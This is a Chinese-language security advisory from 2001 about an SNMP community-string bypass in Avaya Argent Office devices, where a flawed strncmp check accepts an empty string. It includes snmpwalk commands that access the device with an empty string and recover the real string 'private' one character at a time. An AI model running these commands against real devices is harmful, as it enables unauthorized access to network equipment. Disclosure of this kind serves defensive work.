Avaya Argent Office SNMP通信字处理漏洞
发布日期:2001-08-07
更新日期:2001-08-08
受影响系统:
Network Alchemy(Avaya) Argent Office
描述:
Network Alchemy公司开发的Argent Office产品是一套综合了语音分组交换、网络数据连
接以及拨入服务功能的网络服务器。
该设备在处理SNMP通信字时存在一个安全漏洞,允许攻击者不需通信字即可访问SNMP。
它在进行通信字匹配时采用类似下面的比较方法:
if (strncmp(n,c,strlen(n))==0) { ok, 有效的通信字}
这里n是用户传送的通信字,c是系统的通信字。
这样,如果用户传送一个空串作为通信字,上面的匹配就会通过。
<*来源:Jacek Lipkowski (
sq5bpf@acid.ch.pw.edu.pl) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Jacek Lipkowski (
sq5bpf@acid.ch.pw.edu.pl)提供了下列测试方法:
如果使用空通信字,就可以直接访问:
~$ snmpwalk 192.168.1.234 "" system.sysDescr.0
system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)
攻击者也可以依次猜测通信字的每一个字符:
猜测第一个字符:
~$ snmpwalk 192.168.1.234 a system.sysDescr.0
Timeout: No Response from 192.168.1.234
[第一个字符不是'a']
[猜测第一个字符,是不是'p'?]
~$ snmpwalk 192.168.1.234 p system.sysDescr.0
system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)
[ok,我们得到了第一个字符,现在开始猜测第二个字符]
~$ snmpwalk 192.168.1.234 pa system.sysDescr.0
Timeout: No Response from 192.168.1.234
[第二个字符不是'a']
[猜测第二个字符,是不是'r'?]
~$ snmpwalk 192.168.1.234 pr system.sysDescr.0
system.sysDescr.0 = ARGENT OFFICE CPU 2.1 (138)
....
最后可以发现通信字是'private'.
建议:
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.midlandcomms.co.uk/argent_office.htm
浏览次数:3993
严重程度:0(网友投票)